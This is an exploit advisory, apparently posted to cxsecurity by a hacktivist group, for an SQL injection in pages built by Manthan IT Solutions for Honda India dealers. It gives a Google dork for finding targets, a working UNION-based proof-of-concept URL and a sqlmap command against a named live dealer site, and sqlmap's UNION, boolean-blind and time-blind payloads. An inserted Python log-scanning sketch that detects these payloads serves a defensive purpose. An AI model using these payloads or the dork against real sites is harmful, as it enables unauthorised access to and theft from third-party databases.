Honda India - SQL Injection (vendor: Manthan IT Solutions), tested on BackBox 7 GNU/Linux


Exploit Information:

# Exploit Title : Honda India - SQL Injection
# Google Dork :
- inurl:model.php?id= site:.in
- Powered by Manthan IT Solutions. honda

# Date : 2021.07.10
# Exploit Author :
- Hz3666Ghost
- Indoghostsec
- AnonGhost
- Ghostsec
- cxsecurity.com

# Vendor Homepage: [https://manthanitsolutions.com/]
# Software Link: N/A
# Version: -
# Tested on: BackBox 7
# Remote: yes
# CVE : N/A


PoC Exploit:

/model.php?id=-graziasport_01%27%20union%20all%20select%201,2,3,4,5,6,database(),8--%20-&name=grazia125_sports

Example Test :

http://www.royalhonda.in/model.php?id=-graziasport_01%27%20union%20all%20select%201,2,3,4,5,6,database(),8--%20-&name=grazia125_sports


Example PoC with sqlmap:

sqlmap -u "http://www.royalhonda.in/model.php?id=xblade_01&name=xblade" --dbs

Exploit with sqlmap (reported injection points):

Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=-9544' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qppzq','YHOTRlmjgPdebOdFVBWLWrtTfpWZAmDIFFIbQPUC'),'qkbxq'),NULL-- zKSh&name=xblade

Parameter: name (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=xblade_01&name=xblade' AND 7808=7808 AND 'kDIn'='kDIn

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=xblade_01&name=xblade' AND (SELECT 8044 FROM (SELECT(SLEEP(5)))gSVI) AND 'Srct'='Srct
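
A log-triage sketch for the findings above, added here as an example and not part of the original advisory: it flags requests to model.php whose id or name value is not a plain slug and labels each hit with one of the three sqlmap finding types. The combined log format, the slug rule (taken from the legitimate values xblade_01 and grazia125_sports) and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Legitimate values on the page (xblade_01, grazia125_sports) are plain slugs.
SLUG = re.compile(r"[A-Za-z0-9_]{1,64}")
# One signature per sqlmap finding type listed in the advisory.
SIGNATURES = [
    ("union", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("time-blind", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean-blind", re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return 'ok' for a slug, a technique label, or 'non-slug' otherwise."""
    if SLUG.fullmatch(value):
        return "ok"
    for label, rx in SIGNATURES:
        if rx.search(value):
            return label
    return "non-slug"

def scan(lines, path="/model.php", params=("id", "name")):
    """Return (line_no, client, param, label) for each suspicious value."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path != path:
            continue
        query = parse_qs(url.query, keep_blank_values=True)  # URL-decodes values
        for p in params:
            for v in query.get(p, []):
                if (label := classify(v)) != "ok":
                    findings.append((n, line.split()[0], p, label))
    return findings

# Constructed combined-format log lines (documentation IPs), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jul/2021:09:00:01 +0000] "GET /model.php?id=xblade_01&name=xblade HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jul/2021:09:00:05 +0000] "GET /model.php?id=-9544%27%20UNION%20ALL%20SELECT%20NULL,NULL--%20-&name=xblade HTTP/1.1" 200 5300',
    '203.0.113.9 - - [10/Jul/2021:09:00:07 +0000] "GET /model.php?id=xblade_01&name=xblade%27%20AND%207808=7808%20AND%20%27kDIn%27=%27kDIn HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Jul/2021:09:00:13 +0000] "GET /model.php?id=xblade_01&name=xblade%27%20AND%20(SELECT%208044%20FROM%20(SELECT(SLEEP(5)))gSVI)%20AND%20%27Srct%27=%27Srct HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same slug rule, enforced server-side before the value reaches a parameterized query, rejects all three payload types.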

Login Page : N/A



Exploit Source : [cxsecurity.com Hz3666Ghost]
